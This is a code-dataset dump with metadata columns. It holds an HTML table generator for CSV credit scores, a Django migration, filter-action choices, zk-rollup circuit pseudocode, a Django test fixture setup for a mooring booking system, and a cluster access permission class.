] | 1 | 2020-05-25T17:12:12.000Z | 2020-05-25T17:12:12.000Z | #!/usr/bin/python
#
# This script generates a simple HTML page (via STDOUT) including tables for the data generated by join_csvs.py script.
# Each table will contain 3 x 2 colums, that is, 3 columns per CSV file (currently only 2 CSV files are supported).
#
# The resulting table is something like:
# name_CSV1,cred_CSV1,name_cred_CSV2
# jlcanovas,23.21,jcabo,22.33
#
# It helps to visualize and compare the cred variations between graphs with different weights
#
# Author: Javier Canovas (me@jlcanovas.es)
#
import csv
import sys
files = [
# Set here the name of the projects to consider (e.g., "d3/d3")
]
# These variables are use to locate the CSV file
# The script will look for PREFFIX + files[i] + SUFFIX1 and then for PREFFIX + files[i] + SUFFIX2
PREFFIX = "credResult_"
SUFFIX1 = "_CODERS.csv"
SUFFIX2 = "_COMMENTERS.csv"
# Number of row to list in each table
TABLE_SIZE = 10
# Generating the website (quite adhoc)
print('<!DOCTYPE html><html><head></head>')
print('<style>')
print('table { border: 1px solid black; margin-right: auto; margin-left: auto; margin-top: 15px;}')
print('th { padding: 5px 10px 5px 10px; text-align: center; border-bottom: 1px solid #000000; }')
print('td { padding: 5px 10px 5px 10px; text-align: left; border-bottom: 1px solid #ddd; }')
print('</style>')
print('<body>')
# For each project to consider
for file in files:
# Getting first CSV file
coders_csv_path = PREFFIX + file + SUFFIX1
coders_tuplelist = []
with open(coders_csv_path, newline='') as csv1_file:
csv1_reader = csv.reader(csv1_file, delimiter=',')
for row in csv1_reader:
if row[2] == "USERLIKE":
coders_tuplelist.append(tuple(row))
# Ordering the csv data according to cred column
coder_sorted = sorted(coders_tuplelist, key=lambda r: float(r[1]), reverse=True)
# Getting second CSV file
commenters_csv_path = PREFFIX + file + SUFFIX2
commenters_tuplelist = []
with open(commenters_csv_path, newline='') as csv2_file:
csv2_reader = csv.reader(csv2_file, delimiter=',')
for row in csv2_reader:
if row[2] == "USERLIKE":
commenters_tuplelist.append(tuple(row))
# Ordering the csv data according to cred column
commenters_sorted = sorted(commenters_tuplelist, key=lambda r: float(r[1]), reverse=True)
# Printing the table for this couple of CSVs
print('<table>')
print(f'<tr><th colspan="4">{file}</th></tr>')
print('<tr><th>Username</th><th>Coder Cred</th><th>Username</th><th>Commenter Cred</th></tr>')
for i in range(0, TABLE_SIZE):
print(f'<tr><td>{coder_sorted[i][3]}</td><td>{coder_sorted[i][1]}</td><td>{commenters_sorted[i][3]}</td><td>{commenters_sorted[i][1]}</td>')
print('</table>')
print('</body>') | 39.422535 | 148 | 0.679886 | 417 | 2,799 | 4.472422 | 0.40048 | 0.015013 | 0.016086 | 0.017158 | 0.211796 | 0.138338 | 0.138338 | 0.106166 | 0.106166 | 0.066488 | 0 | 0.028909 | 0.184352 | 2,799 | 71 | 149 | 39.422535 | 0.787998 | 0.350125 | 0 | 0.051282 | 1 | 0.128205 | 0.358575 | 0.139755 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.051282 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c269dde7109479fb6efad17159039578bb957d1e | 552 | py | Python | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-20 14:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_category'),
]
operations = [
migrations.AddField(
model_name='post',
name='category',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='blog_category', to='blog.category'),
preserve_default=False,
),
]
| 26.285714 | 143 | 0.61413 | 61 | 552 | 5.459016 | 0.622951 | 0.072072 | 0.084084 | 0.132132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049628 | 0.269928 | 552 | 20 | 144 | 27.6 | 0.776675 | 0.081522 | 0 | 0 | 1 | 0 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c26fcb06b64b44f5a26f198468b7bddf5846a95b | 396 | py | Python | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null |
FILTER_ACTION_ON_CHOICES = (
('entry', 'On Entry'),
('exit', 'On Exit'),
)
FILTER_ACTION_TYPE_CHOICES = (
('eml', 'Send Email Notification'),
('sms', 'Send SMS Notification'),
('slk', 'Send Slack Notification'),
('cus', 'Custom Action'),
('drv', 'Derive Stream Action'),
('rpt', 'Report Generation Action'),
('smry', 'Summary Report Generation Action'),
)
| 22 | 49 | 0.59596 | 42 | 396 | 5.47619 | 0.571429 | 0.104348 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207071 | 396 | 17 | 50 | 23.294118 | 0.732484 | 0 | 0 | 0 | 0 | 0 | 0.513995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c274f1539367101bb7e5be3fc70ed5dd3ad7eb39 | 14,993 | py | Python | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 1,274 | 2019-12-05T15:32:00.000Z | 2022-03-31T19:24:23.000Z | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 190 | 2019-12-05T16:27:08.000Z | 2022-03-31T20:03:06.000Z | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 309 | 2019-12-09T09:26:01.000Z | 2022-03-31T13:10:17.000Z | # Citcuit pseudocode
# Data structures
struct op:
# operation data
tx_type: # type of transaction, see the list: https://docs.google.com/spreadsheets/d/1ejK1MJfVehcwjgjVDFD3E2k1EZ7auqbG_y0DKidS9nA/edit#gid=0
chunk: # op chunk number (0..3)
pubdata_chunk: # current chunk of the pubdata (always 8 bytes)
args: # arguments for the operation
# Merkle branches
lhs: # left Merkle branch data
rhs: # right Merkle branch data
clear_account: # bool: instruction to clear the account in the current branch
clear_subaccount: # bool: instruction to clear the subaccount in the current branch
# precomputed witness:
a: # depends on the optype, used for range checks
b: # depends on the optype, used for range checks
new_root: # new state root after the operation is applied
account_path: # Merkle path witness for the account in the current branch
subtree_path: # Merkle path witness for the subtree in the current branch
struct cur: # current Merkle branch data
struct computed:
last_chunk: # bool: whether the current chunk is the last one in sequence
pubdata: # pubdata accumulated over all chunks
range_checked: # bool: ensures that a >= b
new_pubkey_hash: # hash of the new pubkey, truncated to 20 bytes (used only for deposits)
# Circuit functions
def circuit:
running_hash := initial_hash
current_root := last_state_root
prev.lhs := { 0, ... }
prev.rhs := { 0, ... }
prev.chunk := 0
prev.new_root := 0
for op in operations:
# enfore correct bitlentgh for every input in witness
# TODO: create a macro gadget to recursively iterate over struct member annotations (ZKS-119).
for x in op:
verify_bitlength(x)
# check and prepare data
verify_correct_chunking(op, computed)
accumulate_sha256(op.pubdata_chunk)
accumulate_pubdata(op, computed)
# prepare Merkle branch
cur := select_branch(op, computed)
cur.cosigner_pubkey_hash := hash(cur.cosigner_pubkey)
# check initial Merkle paths, before applying the operation
op.clear_account := False
op.clear_subaccount := False
state_root := check_account_data(op, cur, computed, check_intersection = False)
enforce state_root == current_root
# check validity and perform state updates for the current branch by modifying `cur` struct
execute_op(op, cur, computed)
# check final Merkle paths after applying the operation
new_root := check_account_data(op, cur, computed, check_intersection = True)
# NOTE: this is checked separately for each branch side, and we already enforced
# that `op.new_root` remains unchanged for both by enforcing that it is shared by all chunks
enforce new_root == op.new_root
# update global state root on the last op chunk
if computed.last_chunk:
current_root = new_root
# update `prev` references
# TODO: need a gadget to copy struct members one by one (ZKS-119).
prev.rhs = op.rhs
prev.lhs = op.lhs
prev.args = op.args
prev.new_root = op.new_root
prev.chunk = op.chunk
# final checks after the loop end
enforce current_root == new_state_root
enforce running_hash == pubdata_hash
enforce last_chunk # any operation should close with the last chunk
# make sure that operation chunks are passed correctly
def verify_correct_chunking(op, computed):
# enforce chunk sequence correctness
enforce (op.chunk == 0) or (op.chunk == prev.chunk + 1) # ensure that chunks come in sequence
max_chunks := switch op.tx_type
deposit => 4,
transfer_to_new=> 1,
transfer => 2,
# ...and so on
enforce op.chunk < max_chunks # 4 constraints
computed.last_chunk = op.chunk == max_chunks-1 # flag to mark the last op chunk
# enforce that all chunks share the same witness:
# - `op.args` for the common arguments of the operation
# - `op.lhs` and `op.rhs` for left and right Merkle branches
# - `new_root` of the state after the operation is applied
correct_inputs :=
op.chunk == 0 # skip check for the first chunk
or (
prev.args == op.args and
prev.lhs == op.lhs and
prev.rhs == op.rhs and
prev.new_root == op.new_root
) # TODO: need a gadget for logical equality which works with structs (ZKS-119).
enforce correct_inputs
# accumulate pubdata from multiple chunks
def accumulate_pubdata(op, computed):
computed.pubdata =
if op.chunk == 0:
op.pubdata_chunk # initialize from the first chunk
else:
computed.pubdata << 8 + op.pubdata_chunk
# determine the Merkle branch side (0 for LHS, 1 for RHS) and set `cur` for the current Merkle branch
def select_branch(op, computed):
op.current_side := LHS if op.tx_type == 'deposit' else op.chunk
# TODO: need a gadget for conditional swap applied to each struct member (ZKS-119).
cur := op.lhs if current_side == LHS else op.rhs
return cur
def check_account_data(op, cur, computed, check_intersection):
# leaf data for account and balance leaves
subaccount_data := (
cur.subaccount_balance,
cur.subaccount_nonce,
cur.creation_nonce,
cur.cosigner_pubkey_hash,
cur.cosigner_balance,
cur.subaccount_token)
balance_data := cur.balance
# subaccount emptiness check and clearing
cur.subaccount_is_empty := subaccount_data == EMPTY_SUBACCOUNT
subaccount_data = EMPTY_SUBACCOUNT if clear_subaccount else subaccount_data
# subtree Merkle checks
balances_root := merkle_root(token, op.balances_path, balance_data)
subaccounts_root := merkle_root(token, op.balances_path, subaccount_data)
subtree_root := hash(balances_root, subaccounts_root)
# account data
account_data := hash(cur.owner_pub_key, cur.subtree_root, cur.account_nonce)
# account emptiness check and clearing
cur.account_is_empty := account_data == EMPTY_ACCOUNT
account_data = EMPTY_ACCOUNT if clear_account else account_data
# final state Merkle root verification with conditional intersection check
intersection_path := intersection(op.account_path, cur.account, lhs.account, rhs.account,
lhs.intersection_hash, rhs.intersection_hash)
path_witness := intersection_path if check_intersection else op.account_path
state_root := merkle_root(cur.account, path_witness, account_data)
return state_root
# verify operation and execute state updates
def execute_op(op, cur, computed):
# universal range check
computed.range_checked := op.a >= op.b
# unpack floating point values and hashes
op.args.amount := unpack(op.args.amount_packed)
op.args.fee := unpack(op.args.fee_packed)
# some operations require tighter amount packing (with less precision)
computed.compact_amount_correct := op.args.amount == op.args.compact_amount * 256
# new pubkey hash for deposits
computed.new_pubkey_hash := hash(cur.new_pubkey)
# signature check
# NOTE: signature check must always be valid, but msg and signer can be phony
enforce check_sig(cur.sig_msg, cur.signer_pubkey)
# execute operations
op_valid := False
op_valid = op_valid or op.tx_type == 'noop'
op_valid = op_valid or transfer_to_new(op, cur, computed)
op_valid = op_valid or deposit(op, cur, computed)
op_valid = op_valid or close_account(op, cur, computed)
op_valid = op_valid or withdraw(op, cur, computed)
op_valid = op_valid or escalation(op, cur, computed)
op_valid = op_valid or create_subaccount(op, cur, computed)
op_valid = op_valid or close_subaccount(op, cur, computed)
op_valid = op_valid or fill_orders(op, cur, computed)
# `op` MUST be one of the operations and MUST be valid
enforce op_valid
def transfer_to_new(op, cur, computed):
# transfer_to_new validation is split into lhs and rhs; pubdata is combined from both branches
lhs_valid :=
op.tx_type == 'transfer_to_new'
# here we process the first chunk
and op.chunk == 0
# sender authorized spending and recepient
and lhs.sig_msg == hash('transfer_to_new', lhs.account, lhs.token, lhs.account_nonce, op.args.amount_packed,
op.args.fee_packed, cur.new_pubkey)
# sender is account owner
and lhs.signer_pubkey == cur.owner_pub_key
# sender has enough balance: we checked above that `op.a >= op.b`
# NOTE: no need to check overflow for `amount + fee` because their bitlengths are enforced]
and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
# NOTE: updating the state is done by modifying data in the `cur` branch
if lhs_valid:
cur.leaf_balance = cur.leaf_balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
rhs_valid :=
op.tx_type == 'transfer_to_new'
# here we process the second (last) chunk
and op.chunk == 1
# compact amount is passed to pubdata for this operation
and computed.compact_amount_correct
# pubdata contains correct data from both branches, so we verify it agains `lhs` and `rhs`
and pubdata == (op.tx_type, lhs.account, lhs.token, lhs.compact_amount, cur.new_pubkey_hash, rhs.account, rhs.fee)
# new account branch is empty
and cur.account_is_empty
# sender signed the same recepient pubkey of which the hash was passed to public data
and lhs.new_pubkey == rhs.new_pubkey
if rhs_valid:
cur.leaf_balance = op.args.amount
return lhs_valid or rhs_valid
def deposit(op, cur, computed):
ignore_pubdata := not last_chunk
tx_valid :=
op.tx_type == 'deposit'
and (ignore_pubdata or pubdata == (cur.account, cur.token, args.compact_amount, cur.new_pubkey_hash, args.fee))
and cur.is_account_empty
and computed.compact_amount_correct
and computed.range_checked and (op.a == op.args.amount) and (op.b == op.args.fee)
if tx_valid:
cur.leaf_balance = op.args.amount - op.args.fee
return tx_valid
def close_account(op, cur, computed):
tx_valid :=
op.tx_type == 'close_account'
and pubdata == (cur.account, cur.subtree_root)
and cur.sig_msg == ('close_account', cur.account, cur.leaf_index, cur.account_nonce, cur.amount, cur.fee)
and cur.signer_pubkey == cur.owner_pub_key
if tx_valid:
op.clear_account = True
return tx_valid
def no_nonce_overflow(nonce):
nonce_overflow := cur.leaf_nonce == 0x10000-1 # nonce is 2 bytes long
return not nonce_overflow
def withdraw(op, cur, computed):
tx_valid :=
op.tx_type == 'withdraw'
and computed.compact_amount_correct
and pubdata == (op.tx_type, cur.account, cur.token, op.args.amount, op.args.fee)
and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
and cur.sig_msg == ('withdraw', cur.account, cur.token, cur.account_nonce, cur.amount, cur.fee)
and cur.signer_pubkey == cur.owner_pub_key
and no_nonce_overflow(cur.leaf_nonce)
if tx_valid:
cur.balance = cur.balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.leaf_nonce + 1
return tx_valid
def escalation(op, cur, computed):
tx_valid :=
op.tx_type == 'escalation'
and pubdata == (op.tx_type, cur.account, cur.subaccount, cur.creation_nonce, cur.leaf_nonce)
and cur.sig_msg == ('escalation', cur.account, cur.subaccount, cur.creation_nonce)
(cur.signer_pubkey == cur.owner_pub_key or cur.signer_pubkey == cosigner_pubkey)
if tx_valid:
cur.clear_subaccount = True
return tx_valid
def transfer(op, cur, computed):
lhs_valid :=
op.tx_type == 'transfer'
and op.chunk == 0
and lhs.sig_msg == ('transfer', lhs.account, lhs.token, lhs.account_nonce, op.args.amount_packed,
op.args.fee_packed, rhs.account_pubkey)
and lhs.signer_pubkey == cur.owner_pub_key
and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
and no_nonce_overflow(cur.account_nonce)
if lhs_valid:
cur.balance = cur.balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
rhs_valid :=
op.tx_type == 'transfer'
and op.chunk == 1
and not cur.account_is_empty
and pubdata == (op.tx_type, lhs.account, lhs.token, op.args.amount, rhs.account, op.args.fee)
and computed.range_checked and (op.a == (cur.balance + op.args.amount) ) and (op.b == cur.balance )
if rhs_valid:
cur.balance = cur.balance + op.args.amount
return lhs_valid or rhs_valid
# Subaccount operations
def create_subaccount(op, cur, computed):
# On the LHS we have cosigner, we only use it for a overflow check
lhs_valid: =
op.tx_type == 'create_subaccount'
and op.chunk == 0
and computed.range_checked and (op.a == rhs.balance) and (op.b == (op.args.amount + op.args.fee) )
# We process everything else on the RHS
rhs_valid :=
op.tx_type == 'create_subaccount'
and op.chunk == 1
and cur.sig_msg == (
'create_subaccount',
cur.account, # cur = rhs
lhs.account, # co-signer account on the lhs
cur.token,
cur.account_nonce,
op.args.amount_packed,
op.args.fee_packed )
and cur.signer_pubkey == cur.owner_pub_key
and cur.subaccount_is_empty
and pubdata == (op.tx_type, lhs.account, lhs.leaf_index, op.args.amount, rhs.account, op.args.fee)
and computed.range_checked and (op.a == (cur.subaccount_balance + op.args.amount) ) and (op.b == cur.subaccount_balance)
and no_nonce_overflow(cur.account_nonce)
if rhs_valid:
# initialize subaccount
cur.subaccount_balance = cur.subaccount_balance + op.args.amount
cur.creation_nonce = cur.account_nonce
cur.cosigner_pubkey = lhs.account_pubkey
cur.subaccount_token = cur.token
# update main account
cur.balance = cur.balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
return lhs_valid or rhs_valid
def close_subaccount(op, cur, computed):
# tbd: similar to create_subaccount()
def fill_orders(op, cur, computed):
# tbd
| 36.127711 | 155 | 0.663776 | 2,098 | 14,993 | 4.576263 | 0.13632 | 0.028747 | 0.029997 | 0.01604 | 0.382148 | 0.306218 | 0.267472 | 0.242891 | 0.171024 | 0.127695 | 0 | 0.00589 | 0.252651 | 14,993 | 414 | 156 | 36.214976 | 0.850959 | 0.273127 | 0 | 0.240506 | 0 | 0 | 0.01851 | 0 | 0 | 0 | 0.000648 | 0.002415 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c277d4a85593300f9dfb007c56b23edbc8c04421 | 9,277 | py | Python | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | null | null | null | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | 2 | 2020-04-30T12:02:15.000Z | 2021-03-19T22:41:46.000Z | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | 6 | 2020-01-13T08:45:09.000Z | 2021-02-24T03:31:02.000Z | from django.test import TestCase
from django.test import Client
from mixer.backend.django import mixer
from django.conf import settings
from importlib import import_module
import time
from .models import *
#from drf_extra_fields.geo_fields import PointField
from django.contrib.gis.geos import Point
from ledger.accounts.models import EmailUser, EmailUserManager
from ledger.payments.models import Invoice, OracleInterfaceSystem
from oscar.apps.order.models import Order
import random
import string
class TestSetup(TestCase):
# client = Client()
def setUp(self):
# adminUN = "admin@website.domain"
# nonAdminUN = "nonadmin@website.domain"
self.client = Client()
#self.superAdminUN = load_superAdminUN
#self.adminUN = load_adminUN
#self.nonAdminUN = load_nonAdminUN
# self.superAdminUN = self.random_email()
# self.adminUN = self.random_email()
# self.nonAdminUN = self.random_email()
self.superAdminUN = 'test.superadmin@dbcatest.com'
self.adminUN = 'test.admin@dbcatest.com'
self.nonAdminUN = 'test.customer@dbcatest.com'
superadminUser = None
adminUser = None
user = None
eum = EmailUserManager()
# self.superadminUser = load_customer
# self.adminUser = load_adminUser
# self.customer = load_superadminUser
# self.superadminUser = EmailUser.objects.create_superuser(pk=1,email=self.superAdminUN, password="pass")
self.superadminUser = EmailUser.objects.create(email=self.superAdminUN, password="pass", is_staff=True, is_superuser=True)
self.superadminUser.set_password('pass')
self.superadminUser.save()
# self.adminUser = EmailUser.objects.create_user(pk=2,email=self.adminUN, password="pass", )
self.adminUser = EmailUser.objects.create(email=self.adminUN,password="pass",is_staff=True, is_superuser=False)
self.adminUser.set_password('pass')
self.adminUser.save()
self.customer = EmailUser.objects.create(email=self.nonAdminUN, password="pass", is_staff=False, is_superuser=False)
self.customer.set_password('pass')
self.customer.save()
ria = MooringAreaGroup.objects.create(name='Rottnest')
pvs = MooringAreaGroup.objects.create(name='PVS')
GlobalSettings.objects.create(key=2,mooring_group=ria,value=25)
GlobalSettings.objects.create(key=2,mooring_group=pvs,value=25)
adLoc = AdmissionsLocation.objects.create(key='ria', text='Rottnest Island Authority', mooring_group=ria)
region = Region.objects.create(name='Rottnest Island',abbreviation='rottnest-island', ratis_id=10, wkb_geometry=Point(115.56141,-32.07424), zoom_level='10', mooring_group=ria)
district = District.objects.create(name='Rottnest Island',abbreviation='rottnest-island', region=region,ratis_id=10, mooring_group=ria)
#user.set_password('pass')
#user.is_staff = False
#user.save()
ria.members.add(self.adminUser)
ria.save()
# self.userAdmin = EmailUser.objects.get(email=self.adminUN)
# self.superUserAdmin = EmailUser.objects.get(email=self.superAdminUN)
# self.customer = EmailUser.objects.get(email=self.nonAdminUN)
# self.customer.is_staff =False
# self.customer.is_superuser =False
# self.customer.save()
orderAdmin = mixer.blend(Order, user=self.adminUser)
invoiceAdmin = mixer.blend(Invoice, order_number=orderAdmin.number, reference="123456")
userNonAdmin = EmailUser.objects.get(email=self.nonAdminUN)
orderNonAdmin = mixer.blend(Order, user=self.customer)
invoiceNonAdmin = mixer.blend(Invoice, order_number=orderNonAdmin.number, reference="987654")
aReason = AdmissionsReason.objects.create(text="abc", detailRequired=False, editable=True, mooring_group=ria)
self.adRate = AdmissionsRate.objects.create(period_start=datetime.now() - timedelta(days=2), period_end=None, adult_cost="15",
adult_overnight_cost="20", concession_cost="5", concession_overnight_cost="7", children_cost="5",
children_overnight_cost="7", infant_cost="5", infant_overnight_cost="7", family_cost="30", family_overnight_cost="40",
comment=None, reason=aReason, mooring_group=ria)
AdmissionsOracleCode.objects.create(oracle_code="0516", mooring_group=ria)
adBooking = AdmissionsBooking.objects.create(customer=self.customer, booking_type=1, vesselRegNo="ABC123", noOfAdults=1, noOfConcessions=0, noOfChildren=0, noOfInfants=0, warningReferenceNo="", totalCost=10.50)
adLine = AdmissionsLine.objects.create(arrivalDate=datetime.now(),overnightStay=False,admissionsBooking=adBooking, cost='10.50', location=adLoc)
openReason = mixer.blend(OpenReason, detailRequired=False, mooring_group=ria)
self.prReason = mixer.blend(PriceReason, detailRequired=False, mooring_group=ria)
#OracleInterfaceSystem.objects.create(system_id="0516", enabled=True, deduct_percentage=False, source='MBS', method='MBS-RECEIPTS')
self.park = mixer.blend(MarinePark, zoom_level=1, oracle_code="0516", mooring_group=ria, district=district)
#self.area = mixer.blend(MooringArea, park=mixer.SELECT, mooring_group=ria)
self.area = mixer.blend(MooringArea, park=self.park, mooring_group=ria, name='Mooring 1', address={})
# self.areaGroup = mixer.blend(MooringAreaGroup, moorings=self.area.id)
# self.areaGroup = mixer.blend(ria, moorings=self.area.id)
self.areaGroup = ria
self.site = mixer.blend(Mooringsite, mooringarea=self.area)
self.bpo = mixer.blend(BookingPeriodOption)
self.bp = mixer.blend(BookingPeriod, booking_period=self.bpo)
self.bp2 = BookingPeriod.objects.create(name='selfbp2')
self.siteRate = mixer.blend(MooringsiteRate, campsite=self.site, booking_period=self.bp, reason=self.prReason)
self.booking = mixer.blend(Booking, departure=datetime.now(), arrival=datetime.now()-timedelta(days=3), mooringarea=self.area)
self.msBooking = mixer.blend(MooringsiteBooking, campsite=self.site, booking=self.booking, from_dt=(datetime.now()+timedelta(days=1)).date(), to_dt=(datetime.now()+timedelta(days=4)).date())
# self.MABRange = mixer.blend(MooringAreaBookingRange, campground=self.area, skip_validation=True)
self.region = region
self.ria = ria
self.adLoc = adLoc
# self.region = mixer.blend(Region, name='Rottnest Island',abbreviation='rottnest-island', ratis_id=10, wkb_geometry=Point(115.56141,-32.07424), zoom_level='10', mooring_group=ria)
self.adReason = mixer.blend(AdmissionsReason, detailRequired=False, mooring_group=ria)
self.opReason = mixer.blend(OpenReason, detailRequired=False, mooring_group=ria)
self.maxStayReason = mixer.blend(MaximumStayReason, detailRequired=False, mooring_group=ria)
self. bb = mixer.blend(Booking, mooringarea=self.area, arrival=datetime.now(), departure=datetime.now()+timedelta(days=1), details={'details': 'Some details'}, )
self.nowplus1 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now()+timedelta(days=1), mooringarea=self.area)
self.nowplus2 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now()+timedelta(days=2), mooringarea=self.area)
self.nowplus3 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now()+timedelta(days=3), mooringarea=self.area)
self.oneplus4 = Booking.objects.create(arrival=datetime.now()+timedelta(days=1), departure=datetime.now()+timedelta(days=4), mooringarea=self.area)
self.twotonow = Booking.objects.create(departure=datetime.now(), arrival=datetime.now()-timedelta(days=2), mooringarea=self.area)
self.threetonow = Booking.objects.create(departure=datetime.now(), arrival=datetime.now()-timedelta(days=3), mooringarea=self.area)
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
self.session = store
self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key
def random_email(self):
"""Return a random email address ending in dbca.wa.gov.au
"""
# print time
# time.sleep(5)
# import time as systime
# systime.sleep(2)
s = ''.join(random.choice(string.ascii_letters) for i in range(80))
return '{}@dbca.wa.gov.au'.format(s)
#def random_email():
# """Return a random email address ending in dbca.wa.gov.au
# """
# s = ''.join(random.choice(string.ascii_letters) for i in range(80))
# return '{}@dbca.wa.gov.au'.format(s)
#
#
#load_superAdminUN = random_email()
#load_adminUN = random_email()
#load_nonAdminUN = random_email()
#
#load_superadminUser = EmailUser.objects.create_superuser(email=load_superAdminUN, password="pass")
#load_adminUser = EmailUser.objects.create_user(email=load_adminUN, password="pass", )
#load_customer = EmailUser.objects.create(email=load_nonAdminUN, password="pass", is_staff=False, is_superuser=False)
| 57.265432 | 218 | 0.713485 | 1,106 | 9,277 | 5.88698 | 0.232369 | 0.055905 | 0.036861 | 0.044233 | 0.40685 | 0.283059 | 0.225311 | 0.201659 | 0.190908 | 0.13792 | 0 | 0.016433 | 0.160397 | 9,277 | 161 | 219 | 57.621118 | 0.819489 | 0.267651 | 0 | 0 | 0 | 0 | 0.050289 | 0.016911 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0.068182 | 0.159091 | 0 | 0.204545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c27ef209ac9851af64ea4375eae1f4a2a3f60001 | 1,433 | py | Python | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from rest_framework.permissions import BasePermission
from backend.container_service.clusters.base.utils import get_cluster_type
from backend.container_service.clusters.constants import ClusterType
class AccessClusterPermission(BasePermission):
""" 拦截所有共享集群相关的请求 """
message = '当前请求的 API 在共享集群中不可用'
def has_permission(self, request, view):
cluster_id = view.kwargs.get('cluster_id') or request.query_params.get('cluster_id')
return get_cluster_type(cluster_id) != ClusterType.SHARED
class AccessClusterPermMixin:
""" 集群接口访问权限控制 """
